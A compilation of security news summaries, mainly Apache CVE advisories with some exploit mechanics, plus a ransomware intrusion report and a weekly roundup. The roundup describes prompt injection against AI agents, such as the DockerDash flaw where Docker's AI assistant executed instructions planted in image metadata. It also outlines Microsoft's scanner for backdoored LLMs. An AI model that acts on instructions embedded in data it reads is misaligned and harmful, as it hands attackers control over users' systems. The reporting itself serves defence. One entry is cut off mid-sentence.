Critical Vulnerabilities in Apache ActiveMQ Demand Immediate Patching Apache ActiveMQ users must apply urgent security updates following the disclosure of two critical vulnerabilities CVE-2026-42253 and CVE-2026-49157 that expose systems to HTTP header injection and privilege escalation risks. CVE-2026-42253: HTTP Response Header Injection via JMS Properties Affected versions of Apache ActiveMQ and its web components (prior to 5.19.7 and 6.2.6) contain a flaw in the MessageServlet component, where JMS message properties are unsafely copied into HTTP response headers without validation. This allows attackers to inject or manipulate headers, including Content-Security-Policy, Set-Cookie, and Access-Control-Allow-Origin, leading to potential cross-site scripting (XSS), session hijacking, cache poisoning, or security control bypasses. The vulnerability is exploitable in environments where the web console is exposed, particularly in loosely secured messaging setups. CVE-2026-49157: Improper Jolokia Authorization The second flaw affects the Jolokia management interface, where default authorization settings are overly permissive. Authenticated low-privilege users can retain access to administrative operations, such as modifying queues, enabling unauthorized configuration changes or messaging disruptions. This issue also impacts versions before 5.19.7 and 6.2.6. Impact and Mitigation Both vulnerabilities are rated "important" by the Apache Software Foundation. Exploitation could result in security control bypasses, privilege escalation, or infrastructure abuse. Apache has addressed the issues by disabling the vulnerable MessageServlet by default in patched releases (5.19.7 and 6.2.6). Security researchers Vishal Shukla, pyn3rd, uname, 4ra1n, and Leon Johnson were credited with discovering the flaws, underscoring risks in default configurations and input validation. Organizations using affected versions should upgrade immediately, restrict management interface access, and audit JMS message flows to mitigate exposure.

Apache CXF LDAP Injection Flaw (CVE-2026-44930) Exposes Digital Certificates A critical vulnerability in Apache CXF, tracked as CVE-2026-44930, has been disclosed, posing risks to enterprises using its XKMS (XML Key Management Specification) services for certificate management. The flaw, rated as important severity, stems from improper input validation in the LDAP-based certificate repository component, enabling attackers to extract arbitrary digital certificates from vulnerable systems. The issue affects Apache CXF versions 4.2.0 before 4.2.1, 4.0.0 through 4.1.5, and all versions prior to 3.6.11. Exploitation occurs when attackers craft malicious LDAP queries to manipulate search filters, bypassing access controls and retrieving certificates beyond their authorized scope. While the vulnerability does not permit remote code execution, compromised certificates could facilitate impersonation, encrypted traffic interception, or lateral movement within corporate networks. The flaw was publicly disclosed on May 22, 2026, via the Apache developer mailing list. The Apache Software Foundation has released patched versions (4.2.1, 4.1.6, and 3.6.11) that implement stricter input validation to mitigate LDAP injection risks. Organizations using affected versions particularly those leveraging XKMS for certificate lifecycle management are urged to upgrade immediately. The incident underscores the persistent threat of injection vulnerabilities in enterprise middleware, where even modern frameworks can expose sensitive cryptographic assets if directory query handling is flawed.

Critical RCE Vulnerability in Apache Flink Exposes Distributed Data Processing Clusters A newly disclosed critical vulnerability in Apache Flink (CVE-2026-35194) enables remote code execution (RCE) via SQL injection flaws in the platform’s code generation engine. The flaw stems from improper sanitization of user-supplied input in Flink’s SQL-to-Java translation process, allowing authenticated attackers with query submission privileges to inject malicious payloads and execute arbitrary code on TaskManager nodes. The vulnerability affects JSON functions (introduced in Flink 1.15.0) and LIKE expressions with ESCAPE clauses (introduced in 1.17.0). By crafting specially designed SQL queries, attackers can manipulate the code generation process, breaking out of string literals to inject Java expressions or method calls. Successful exploitation could lead to full cluster compromise, data manipulation, or lateral movement within the environment posing heightened risks in multi-tenant or shared deployments. Affected Versions: - Apache Flink 1.15.0 – 1.20.x (before 1.20.4) - Apache Flink 2.0.0 – 2.x (before 2.0.2, 2.1.2, or 2.2.1) The issue was publicly disclosed by Apache contributor Martijn Visser on May 15, 2026, and rated critical due to its potential impact on production clusters. Apache has released patched versions (1.20.4, 2.0.2, 2.1.2, 2.2.1) to mitigate the flaw. Organizations are advised to upgrade immediately, restrict query submission privileges, monitor for anomalous SQL activity, and implement runtime security controls on TaskManager nodes.

Apache HTTP Server Patched for Critical RCE Vulnerability (CVE-2026-23918) The Apache Software Foundation has released an urgent security update to address a severe vulnerability (CVE-2026-23918) in the Apache HTTP Server, which could allow remote code execution (RCE) on affected systems. The flaw, classified as a "double free" memory corruption issue, stems from improper handling of HTTP/2 "early reset" commands, causing the server to free the same memory block twice. Exploitation of this bug could lead to server crashes (resulting in denial-of-service attacks) or, in worst-case scenarios, enable attackers to execute arbitrary code, gain control of the system, steal data, or deploy ransomware. The vulnerability affects Apache HTTP Server version 2.4.66 with HTTP/2 enabled, posing a significant risk due to the server’s widespread use. Discovered by researchers Bartłomiej Dmitruk (striga.ai) and Stanisław Strzałkowski (isec.pl), the flaw was privately reported to Apache on December 10, 2025. While a fix was implemented the following day, the official patch was released on May 4, 2026, as part of version 2.4.67. Administrators are advised to update immediately or disable HTTP/2 as a temporary mitigation. Unusual HTTP/2 traffic or server crashes in logs may indicate attempted exploitation.

Apache Tomcat Patches Critical Vulnerabilities Exposing Encryption and Certificate Validation Flaws Apache Tomcat has released urgent security updates addressing three critical vulnerabilities that could allow attackers to bypass encryption protections or exploit flawed certificate validation in enterprise web environments. The first flaw, CVE-2026-29146, affects Tomcat’s EncryptInterceptor component, which secures session data using CBC-mode encryption. Researchers discovered the implementation was vulnerable to a padding oracle attack, enabling attackers to analyze server responses and extract sensitive encrypted data. Impacted versions include Tomcat 11.0.0-M1 to 11.0.18, 10.1.0-M1 to 10.1.52, and 9.0.13 to 9.0.115. A subsequent patch for CVE-2026-29146 introduced a second vulnerability, CVE-2026-34486, due to a coding error that allowed attackers to bypass EncryptInterceptor entirely. This flaw affects Tomcat 11.0.20, 10.1.53, and 9.0.116, leaving systems exposed despite prior remediation efforts. The third issue, CVE-2026-34500, involves Tomcat’s Online Certificate Status Protocol (OCSP) validation. In configurations using the Foreign Function and Memory API, revoked or invalid certificates could be incorrectly accepted, even with soft-fail disabled. Affected versions span Tomcat 11.0.0-M14 to 11.0.20, 10.1.22 to 10.1.53, and 9.0.92 to 9.0.116, potentially granting unauthorized access to attackers using compromised certificates. Apache has released fixed versions Tomcat 11.0.21, 10.1.54, and 9.0.117 and urges administrators to upgrade immediately, particularly if EncryptInterceptor or certificate-based authentication is enabled. The vulnerabilities underscore the risks of incomplete patches and the need for rigorous validation in web infrastructure security.

Sophisticated Supply Chain Attack Compromises Trivy GitHub Action, Exposing CI/CD Pipelines Globally In late March 2026, a high-impact supply chain attack targeted the official Trivy GitHub Action (aquasecurity/trivy-action), a widely used security scanning tool in continuous integration and continuous deployment (CI/CD) pipelines. Threat actors executed a force-push attack, compromising 75 out of 76 existing version tags to distribute a malicious infostealer designed to exfiltrate credentials. This incident is the second Trivy-related compromise in a single month, raising concerns about a potential pattern of targeted attacks. With over 10,000 GitHub workflows relying on the affected action, the breach exposes a vast number of organizations to credential theft undermining the very tool meant to secure their pipelines. The attack highlights the escalating risk of supply chain vulnerabilities in CI/CD environments, where trusted dependencies can become vectors for exploitation. Security teams are advised to prioritize strict version control, dependency validation, and continuous monitoring to mitigate similar threats. The incident underscores the need for rigorous verification of third-party tools, even those positioned as security solutions.

Critical DoS Vulnerability in Apache ActiveMQ Exposes Systems to Disruption A severe vulnerability in Apache ActiveMQ, a widely used open-source message broker, has been disclosed, allowing threat actors to trigger Denial-of-Service (DoS) conditions by exploiting improper validation in MQTT packet handling. Tracked as CVE-2025-66168, the flaw affects multiple ActiveMQ components, including the core broker, All module, and MQTT transport module. The vulnerability was reported by Christopher L. Shannon on March 3, 2026, via the Apache users mailing list. ActiveMQ, which facilitates communication between distributed systems using protocols like MQTT, AMQP, and OpenWire, is particularly critical in IoT deployments and microservices architectures. The issue stems from improper validation of the “remaining length” field in MQTT control packets. According to the MQTT v3.1.1 specification, this field is limited to four bytes to prevent overflow. However, affected ActiveMQ versions fail to enforce this restriction, allowing attackers to craft malformed packets that trigger an integer overflow during decoding. This causes the broker to misinterpret the payload, leading to resource exhaustion or service disruption. Exploitation requires an authenticated MQTT session, meaning attackers must first establish a valid connection. While the flaw does not enable remote code execution or data breaches, it can cripple message delivery, disrupting IoT networks and microservices reliant on ActiveMQ. Systems not using MQTT transport connectors remain unaffected. The vulnerability impacts the following versions: - Apache ActiveMQ (core): Before 5.19.2, 6.0.0–6.1.8, and 6.2.0 - Apache ActiveMQ All Module: Before 5.19.2, 6.0.0–6.1.8, and 6.2.0 - Apache ActiveMQ MQTT Module: Before 5.19.2, 6.0.0–6.1.8, and 6.2.0 Apache has released patches in versions 5.19.2, 6.1.9, and 6.2.1, which enforce proper validation of the “remaining length” field to prevent overflow. The flaw highlights the risks of protocol parsing oversights in message brokers, which can lead to widespread availability issues in connected systems.

Critical XXE Vulnerability Discovered in Apache Syncope IAM Platform Apache Syncope, a widely used open-source identity and access management (IAM) solution, has disclosed a critical XML External Entity (XXE) vulnerability in its Console component. Tracked as CVE-2026-23795, the flaw allows authenticated administrators to execute XXE attacks, potentially extracting sensitive data from affected systems. The vulnerability was discovered by security researchers Follycat and Y0n3er and stems from improper restrictions on XML External Entity references in the Syncope Console. Exploiting this flaw, attackers with administrative access can craft malicious XML payloads via Keymaster parameters, enabling unauthorized file reads, internal system access, and potential privilege escalation within IAM infrastructure. The issue affects Apache Syncope versions 3.0–3.0.15 and 4.0–4.0.3, impacting thousands of global deployments. Given the platform’s role in managing authentication and authorization, compromised session tokens could grant attackers access to user accounts and sensitive organizational resources. Apache has released patched versions (3.0.16 and 4.0.4) that implement hardened XML parsing to mitigate the risk. Organizations are advised to upgrade immediately to prevent exploitation. The vulnerability underscores the importance of securing administrative access in IAM environments, where misconfigurations can lead to severe data breaches.

Apache ZooKeeper Patches Critical Flaws Exposing Sensitive Data and Enabling Server Spoofing The Apache Software Foundation (ASF) has released urgent security patches for Apache ZooKeeper, addressing two high-severity vulnerabilities that could lead to sensitive data exposure and server impersonation attacks in distributed systems. The first flaw, CVE-2026-24308, stems from improper log sanitization in the ZKConfig component, which inadvertently logs configuration values including credentials and environment settings in plain text at the INFO level. Since INFO logging is enabled by default in production, attackers with access to logs could extract confidential data. Security researcher Youlong Chen disclosed the issue, which affects ZooKeeper versions 3.8.0–3.8.5 and 3.9.0–3.9.4. The second vulnerability, CVE-2026-24281, involves a hostname verification bypass in the ZKTrustManager. When standard IP-based Subject Alternative Name (SAN) checks fail, ZooKeeper falls back to reverse DNS (PTR) lookups, allowing attackers to spoof legitimate servers by manipulating PTR records. While exploitation requires a trusted digital certificate, the flaw poses a significant risk in secure environments. Nikita Markevich reported the issue, tracked internally as ZOOKEEPER-4986. ASF has released patched versions (3.8.6 and 3.9.5), which fix the logging issue by preventing credential exposure and introduce a configuration option to disable reverse DNS lookups. Administrators are advised to upgrade immediately and audit logs for exposed credentials.

13-Year-Old Apache ActiveMQ RCE Flaw Discovered by AI Assistant A critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has been uncovered after remaining undetected for 13 years. The flaw allows attackers to execute arbitrary commands by forcing the message broker to download and run a malicious remote configuration file. The exploit targets Jolokia, a REST API interface in ActiveMQ’s web-based management console. While developers restricted Jolokia to read-only operations in 2023, they retained full permissions for ActiveMQ’s management beans (MBeans), creating a security gap. Attackers can abuse the `addNetworkConnector` operation by supplying a crafted `vm://` URI, which fetches a remote Spring XML file and executes it, granting full system control. Under normal conditions, exploitation requires administrator credentials (e.g., default `admin:admin`). However, in ActiveMQ versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) removes authentication requirements, enabling unauthenticated RCE. Security researcher Naveen Sunkavally discovered the vulnerability using Claude AI, which analyzed the codebase in 10 minutes a task that typically takes human researchers weeks. The AI identified the interaction between Jolokia, JMX, and network connectors, demonstrating the growing role of AI in vulnerability hunting. ActiveMQ has been a frequent target for ransomware groups and nation-state actors, making this a high-priority patch. Organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove the dangerous `vm://` transport capability from remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious `vm://` URIs, and watching for unexpected POST requests to `/api/jolokia/` containing `addNetworkConnector`.

A critical security vulnerability has been discovered in the Apache bRPC framework that could allow remote attackers to crash servers by sending specially crafted JSON data. The flaw, tracked as CVE-2025-59789, affects all versions of Apache bRPC before 1.15.0 across all platforms. The vulnerability exists in the json2pb component of Apache bRPC, which converts JSON data to Protocol Buffer messages. The component relies on rapidjson for parsing JSON data received from the network. By default, the rapidjson parser uses a recursive parsing method. When attackers send JSON data with deeply nested recursive structures, the parser function exhausts the stack memory, resulting in a stack overflow. Field Details CVE ID CVE-2025-59789 CVSS Score 9.8 (Critical) Attack Vector Network Affected Versions Apache bRPC < 1.15.0 Vulnerability Type Uncontrolled Recursion / Stack Overflow This causes the server to crash, leading to a denial-of-service condition. Organizations using bRPC servers are at risk if they meet any of the following conditions. Running a bRPC server with protobuf messages that handles HTTP+JSON requests from untrusted networks. Using the JsonToProtoMessage function to convert JSON from untrusted input sources, Apache has provided two options to address this security issue: Upgrade to Apache bRPC version 1.15.0, which includes the complete fix for this vulnerability. Apply the official patch available on GitHub for those unable to upgrade immediately. Both fixes

Cybersecurity Roundup: Trust Abuse, AI Risks, and Supply Chain Attacks Dominate Threat Landscape This week’s cybersecurity developments highlight a growing trend: attackers are increasingly exploiting trusted systems AI platforms, software updates, messaging apps, and open-source ecosystems to bypass security controls. Below are the key incidents and trends shaping the threat landscape. ### AI and Open-Source Ecosystems Under Siege OpenClaw, an open-source AI agent framework, has partnered with Google’s VirusTotal to scan uploaded "skills" (AI extensions) for malware, following discoveries of malicious components in its ClawHub marketplace. Researchers warn that AI agents’ broad permissions, persistent memory, and user-controlled configurations create risks like prompt injection, data exfiltration, and supply chain attacks. Trend Micro reported threat actors on Exploit.in discussing OpenClaw for botnet operations, while Veracode noted a surge in typosquatted "claw" packages on npm and PyPI from zero in early 2026 to over 1,000 by February. Meanwhile, MoltBook, an AI-driven social platform built on OpenClaw, faces scrutiny after Simula Research Laboratory identified 506 prompt injection attacks, social engineering exploits, and unregulated cryptocurrency activity comprising 19.3% of its content. The platform’s autonomous AI agents, which interact without human oversight, raise concerns about data privacy and manipulation risks. Security firm Pillar Security detected active scanning of exposed OpenClaw gateways (port 18789), with attackers bypassing AI layers to target the WebSocket API directly for authentication bypasses and command execution. Censys identified 21,639 exposed OpenClaw instances as of January 2026, underscoring the framework’s outdated trust model lacking encryption-at-rest and containerization. ### Supply Chain Attacks: Trusted Updates as Malware Vectors A sophisticated supply chain attack targeted Notepad++ between June and December 2025, where threat actors redirected its WinGUp updater to malicious servers. Despite losing access to a compromised hosting provider in September, attackers reused stolen credentials to maintain control until December. The campaign, attributed to Lotus Blossom, exploited weak update verification in older Notepad++ versions, demonstrating how legitimate domains can become malware distribution hubs. Similarly, Docker’s AI assistant (Ask Gordon) was found vulnerable to remote code execution (RCE) via DockerDash, a flaw in its Model Context Protocol (MCP) Gateway. Attackers could embed malicious instructions in Docker image metadata, which the AI assistant executed without validation. Docker patched the issue in version 4.50.0 (November 2025). ### State-Sponsored Threats and High-Profile Targets Germany’s BfV and BSI issued a joint advisory warning of state-sponsored phishing attacks via Signal, exploiting the app’s PIN and device-linking features to hijack accounts. Targets included high-ranking officials, military personnel, diplomats, and journalists across Germany and Europe. In Ukraine, the government implemented a Starlink terminal verification system after confirming Russian forces were using the technology on attack drones. Only registered devices are now permitted to operate in the country. ### DDoS, Botnets, and Emerging Attack Techniques The AISURU/Kimwolf botnet set a record with a 31.4 Tbps DDoS attack in November 2025, lasting just 35 seconds. Cloudflare mitigated the attack, which was part of a broader campaign ("The Night Before Christmas") starting in December. Overall, DDoS attacks surged 121% in 2025, averaging 5,376 mitigated attacks per hour. Researchers also uncovered 54 malicious npm packages using EtherHiding, a technique leveraging Ethereum smart contracts to fetch C2 servers, complicating takedown efforts. The malware targets Windows systems with 5+ CPUs, employing sandbox evasion, COM hijacking, and system profiling. ### Linux Threats and Post-Exploitation Frameworks Cyble discovered ShadowHS, a fileless Linux post-exploitation framework that runs entirely in memory, prioritizing stealth and long-term control. The framework includes modules for credential access, lateral movement, privilege escalation, and data exfiltration, with aggressive defensive tooling enumeration to avoid detection. ### Ransomware, Dark Markets, and Legal Actions - INC Ransomware suffered a setback after Cyber Centaurs breached its backup server, helping 12 victims recover data. The group, active since 2023, had listed over 100 victims on its leak site. - Rui-Siang Lin, administrator of the Incognito Market darknet drug marketplace, was sentenced to 30 years in prison for facilitating $105 million in narcotics sales to over 400,000 users. - Xinbi, a Telegram-based illicit marketplace, processed $17.9 billion in transactions, outlasting competitors like Haowang and Tudou Guarantee, which saw declines of 100% and 74%, respectively. ### Critical Vulnerabilities and Exploits Notable CVEs disclosed this week include: - CVE-2026-25049 (n8n) - CVE-2026-0709 (Hikvision Wireless Access Point) - CVE-2026-23795 (Apache Syncope) - CVE-2026-1591/1592 (Foxit PDF Editor Cloud) - CVE-2026-24512 (ingress-nginx) - Multiple CVEs in Django, Google Chrome, Cisco, TP-Link, F5 BIG-IP, and Arista NG Firewall Additionally, XBOW uncovered two Insecure Direct Object Reference (IDOR) flaws in Spree (CVE-2026-22588/22589), allowing unauthorized access to user address data. ### Microsoft’s AI Backdoor Scanner Microsoft developed a scanner to detect hidden backdoors in open-weight AI models, addressing risks for enterprises relying on third-party large language models (LLMs). The tool identifies three key indicators: 1. Attention shifts when a hidden trigger is present. 2. Leakage of poisoned training data. 3. Partial triggers still activating malicious responses. The scanner extracts memorized content from models and ranks suspicious substrings as potential triggers. ### Conclusion This week’s incidents underscore a shift in attacker tactics exploiting trust in ecosystems, AI workflows, and supply chains rather than relying on traditional malware. As threats evolve, organizations must monitor integrations, verify updates, and secure AI deployments to mitigate risks from both state-sponsored actors and cybercriminals.

The Akira ransomware group claims to have breached Apache OpenOffice, stealing 23GB of sensitive data, including employee records (physical addresses, phone numbers, driver’s licenses, social security cards, credit card details), financial records, internal confidential files, and problem reports related to the application. The group threatens to leak the data publicly on its dark web site. While the breach remains unverified by the Apache Software Foundation, the potential exposure of employee PII (Personally Identifiable Information) and internal corporate documents poses a significant risk. The attack does not appear to impact end-users or the OpenOffice software distribution system, as the download infrastructure is separate from the compromised development servers. Akira, a ransomware-as-a-service (RaaS) group known for double extortion (data theft + encryption), has targeted organizations globally, earning millions in ransom payments. The group’s claim suggests a targeted breach aimed at extorting the foundation by leveraging stolen employee and financial data.

The Opossum attack exploits a sophisticated cross-protocol application layer desynchronization vulnerability that compromises TLS-based communications. This attack affects critical protocols including HTTP, FTP, POP3, SMTP, LMTP, and NNTP. By leveraging man-in-the-middle positioning, attackers can inject unexpected messages into secure channels, causing persistent desynchronization between clients and servers and breaking the integrity assumptions of encrypted communications. This vulnerability enables session hijacking, content manipulation, and XSS attacks, posing a significant threat to the organization's security.

A newly disclosed flaw in Apache Tomcat’s Coyote engine, tracked as CVE-2025-53506, has been identified. The vulnerability allows a remote attacker to exhaust the server’s thread pool and force the container into a prolonged denial-of-service state by repeatedly initiating streams that are never closed. This issue affects various maintained branches and has been scored 6.3 by CVSS v4. Modern reverse proxies can mitigate the attack by enforcing a SETTINGS-ack timeout or hard stream ceiling until full patch deployment.

Critical Remote Command Injection Vulnerability Discovered in Apache bRPC A severe remote command-injection vulnerability (CVE-2025-60021) has been identified in Apache bRPC, a widely used open-source Remote Procedure Call (RPC) framework. The flaw affects all versions prior to 1.15.0 and stems from inadequate input validation in the built-in heap profiler service endpoint (`/pprof/heap`), which is designed for jemalloc memory profiling. The vulnerability allows attackers to inject malicious command-line arguments via the `extra_options` parameter, enabling arbitrary command execution with the privileges of the bRPC service process. Exploitation is straightforward, as the service directly processes unsanitized user input without validation, bypassing security controls. Organizations using Apache bRPC in distributed systems face significant risk, particularly if the heap profiler endpoint is exposed to untrusted networks or runs with elevated privileges. Successful exploitation could lead to full system compromise, data exfiltration, lateral movement, or persistent backdoor deployment. The Apache bRPC project has released version 1.15.0, which implements proper input validation to mitigate the flaw. Alternatively, organizations can apply a targeted security patch (GitHub pull request #3101) if immediate upgrades are not feasible. Security teams are advised to audit deployments, restrict access to the vulnerable endpoint, and monitor for suspicious activity. The vulnerability was responsibly disclosed by researcher Simcha Kosman, with additional technical details available via the official CVE record and Apache bRPC security advisories.

Honeypot Data Reveals Persistent Cyber Threats: A Year in Exploit Trends (2025–2026) Between May 2025 and May 2026, a global network of honeypots recorded over 9.2 million security events originating from 54,000 unique IP addresses across 163 countries, offering a snapshot of evolving cyber threats. The data, collected from strategically deployed decoy systems, highlights sustained attacker interest in vulnerable services, with SSH (75% of events) dominating activity reinforcing the risks of exposing the protocol directly to the internet. Web applications (10%) and SMTP services (10%) followed, while attacks on medical protocols remained negligible. ### Top Exploited Vulnerabilities Nine vulnerabilities stood out for their high exploitation rates, with React2Shell (CVE-2025-55182) a critical flaw in Next.js servers leading the pack. Disclosed in December 2025, it triggered a surge in attacks, with six IP addresses accounting for 90% of December’s activity. Other notable targets included: - ProxyLogon/ProxyShell/ProxyNotShell (Microsoft Exchange): Persistent exploitation since 2021, leveraging unpatched servers for SYSTEM-level access. - Shellshock (CVE-2014-6271): A decade-old Bash vulnerability still actively probed for initial access. - ThinkPHP (CVE-2018-25270): Sustained attacks on the Chinese PHP framework post-2026 disclosure. - Log4Shell (CVE-2021-44228): Declining but still targeted, reflecting its historical impact. - Legacy Router Flaws: D-Link Dir-645 (CVE-2015-2051) and Netgear DGN1000/DGN2000 (CVE-2024-12847) saw renewed activity, tied to campaigns like Rondodox. - CrushFTP (CVE-2025-54309): A single, concentrated attack on October 13, 2025, exploiting a race-condition flaw. ### Key Observations - Web applications faced relentless attacks, with CVEs like React2Shell and ProxyShell driving spikes. - Routers and IoT devices remained prime targets, often via decade-old vulnerabilities. - Exploit timelines varied: Some flaws (e.g., CrushFTP) saw brief, intense campaigns, while others (e.g., Shellshock) endured as persistent threats. - Attacker behavior aligned globally, with honeypot operators reporting similar patterns. The data underscores the longevity of high-impact vulnerabilities and the risks of unpatched systems, even years after disclosure. Honeypots continue to serve as critical tools for detecting emerging threats and attacker methodologies.

A critical CVE-2025-48989 vulnerability, dubbed ‘Made You Reset’, was discovered in Apache Tomcat’s HTTP/2 implementation, enabling attackers to execute devastating denial-of-service (DoS) attacks by exploiting memory exhaustion flaws. The flaw affects Tomcat versions 9.0.0–11.0.9, risking crashes in thousands of global web servers. Attackers manipulate HTTP/2 stream resets, forcing servers into an OutOfMemoryError state, rendering them unresponsive. The vulnerability requires no authentication, only network access to send malicious requests. While patches (Tomcat 11.0.10, 10.1.44, 9.0.108+) were released, unpatched systems remain exposed to service outages, financial losses from downtime, and reputational damage. Older end-of-life versions may also be vulnerable, amplifying risks for organizations relying on legacy infrastructure. The attack leverages HTTP/2 multiplexing to overwhelm memory pools, disrupting business-critical applications. Mitigations include urgent upgrades, rate limiting, and monitoring for abnormal memory spikes to prevent exploitation.

A significant security vulnerability (CVE-2025-32896) was disclosed in Apache SeaTunnel, a widely used distributed data integration platform. This flaw allows unauthorized users to execute arbitrary file read operations and deserialization attacks, potentially leading to remote code execution (RCE). The vulnerability affects versions 2.3.1 through 2.3.10 and was reported on April 12, 2025. The flaw stems from insufficient access controls in the RESTful API-v1 implementation, specifically targeting the /hazelcast/rest/maps/submit-job endpoint. This vulnerability is particularly dangerous as it can allow attackers to gain control over the affected SeaTunnel instance.

Apache Software has disclosed a critical RCE flaw in their widely-used Tomcat web container. Threat actors, exploiting a public PoC, can compromise and gain control over vulnerable servers with a simple PUT API request. This attack has significant implications as it could allow unauthorized access to sensitive data, disruption of services, and potential hijacking of systems. The exploitation of this vulnerability can result in data breaches, operational downtime, and severe security ramifications for enterprises relying on Apache Tomcat for their Java-based web applications.

Critical Vulnerability in Apache Hadoop HDFS Native Client Exposes Systems to Crashes and Data Corruption A critical vulnerability in Apache Hadoop’s HDFS native client, tracked as CVE-2025-27821, has been disclosed, posing risks of system crashes, memory corruption, and data loss in production environments. The flaw, discovered by security researcher BUI Ngoc Tan, stems from an out-of-bounds write issue in the URI parser component of the HDFS native client, allowing attackers to manipulate untrusted input and overwrite memory beyond allocated boundaries. The vulnerability affects organizations using Apache Hadoop for big data operations, particularly those relying on the HDFS native client in data pipelines and cluster management. Exploitation could lead to denial-of-service (DoS) conditions, memory corruption, or complete system unavailability, with heightened risks for enterprises handling sensitive data on vulnerable HDFS clusters. Apache has classified the flaw as moderate severity but urges immediate action, recommending all affected users upgrade to Hadoop version 3.4.2 or later, which contains the necessary patches. Systems running earlier versions remain exposed. To mitigate risks, administrators are advised to: - Conduct an immediate version audit of Hadoop deployments. - Monitor HDFS logs for suspicious URI patterns. - Implement network-level access controls to restrict HDFS client connections to trusted sources. - Review and update patch management procedures to prioritize this vulnerability. The discovery underscores the importance of timely updates in distributed storage frameworks, particularly in mission-critical big data infrastructure.

A critical vulnerability, CVE-2024-56325, in Apache Pinot has been disclosed with a CVSS score of 9.8 for allowing authentication bypass. Organizations utilizing Apache Pinot prior to version 1.3.0 are at risk of unauthorized data access, record injection, or service disruption. This flaw affects real-time analytics dashboards, financial monitoring, and IoT data processing. Given the remote exploitability and impact on confidentiality, integrity, and availability, immediate system upgrades and auditing for suspicious access patterns are imperative. This vulnerability emphasizes the need for robust defense strategies and software composition analysis tools in handling authentication in distributed systems.

Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack in 19-Day Intrusion A critical remote code execution vulnerability in Apache ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat actors to deploy LockBit ransomware across an enterprise network, spanning 19 days from initial access to full encryption. The attack began in mid-February 2024, targeting a publicly exposed Windows server running the vulnerable messaging broker. The intrusion started when attackers sent a malicious OpenWire command to the ActiveMQ server, forcing it to load a remote Java Spring XML configuration file. This triggered the download of a Metasploit stager via Windows CertUtil, establishing a command-and-control (C2) channel to 166.62.100[.]52. Within 40 minutes, the threat actors escalated to SYSTEM-level privileges, dumped credentials from LSASS process memory, and began lateral movement. Though defenders evicted the attackers on the second day, the unpatched ActiveMQ server remained vulnerable. Eighteen days later, the same threat actors re-entered using the identical exploit, this time leveraging a stolen privileged service account obtained during the first intrusion. Upon return, they confirmed domain administrator access, deployed a disguised network scanner (Advanced IP Scanner masquerading as SoftPerfect Network Scanner), and moved LockBit ransomware executables (LB3.exe, LB3_pass.exe) via RDP sessions. Ransomware execution varied by target file and backup servers received specific path and password arguments, while other hosts were infected via double-click execution. Ransom notes directed victims to Session private messaging, suggesting the attackers used the leaked LockBit Black builder rather than official LockBit infrastructure. The total "Time to Ransomware" was 419 hours (19 days), though the second intrusion could have led to encryption in under 90 minutes if undetected. Attackers also wiped event logs, installed AnyDesk for persistence, and disabled Windows Defender using SystemSettingsAdminFlows.exe on an Exchange server. Key Indicators of Compromise (IOCs): - C2 Server: `166.62.100[.]52` - Ransomware Executables: - `LB3.exe` (`8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6`) - `LB3_pass.exe` (`C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE`) - Disguised Tools: - `netscan.exe` (`87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55`) - `advanced_ip_scanner.exe` (`722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B`) - AnyDesk Client ID: `1148037084` The attack highlights the risks of unpatched critical vulnerabilities, credential theft via LSASS, and rapid lateral movement in ransomware operations.

Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered by AI A newly disclosed remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has been uncovered after remaining hidden for over 13 years. The flaw was identified in just 10 minutes by an AI assistant, demonstrating the accelerating role of artificial intelligence in vulnerability research. The vulnerability resides in ActiveMQ Classic’s web-based management console, which uses Jolokia, a REST API that exposes Java Management Extensions (JMX) operations. While Jolokia was restricted to read-only access following a 2023 vulnerability, developers maintained full access to ActiveMQ’s internal management components (MBeans) for functionality creating a critical security gap. Attackers can exploit the flaw by sending a crafted request to the Jolokia API, abusing the `addNetworkConnector` operation to force the broker to download a malicious remote configuration file via the `vm://` protocol. When processed, the broker retrieves and executes the file, granting attackers full system control. A malicious payload could include a `xbean:http://` URL, triggering arbitrary code execution during connection setup. Under normal conditions, exploitation requires administrative credentials (e.g., `admin:admin`). However, in ActiveMQ Classic versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) unintentionally removed authentication protections from the Jolokia API, turning CVE-2026-34197 into a zero-authentication RCE vulnerability. The discovery was made by security researcher Naveen Sunkavally using Anthropic’s Claude AI model, which analyzed the codebase to identify exposed endpoints and historical vulnerabilities. The AI’s rapid analysis typically a weeks-long manual process highlights how AI is reshaping vulnerability research. Given ActiveMQ’s history as a target for ransomware and advanced threat actors, organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove risky `vm://` transport usage in remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious `vm://` URIs or `brokerConfig=xbean:http` patterns, and watching for unusual POST requests to `/api/jolokia/` containing `addNetworkConnector`. The incident underscores the risks of legacy code paths and the growing efficiency of AI-driven security research.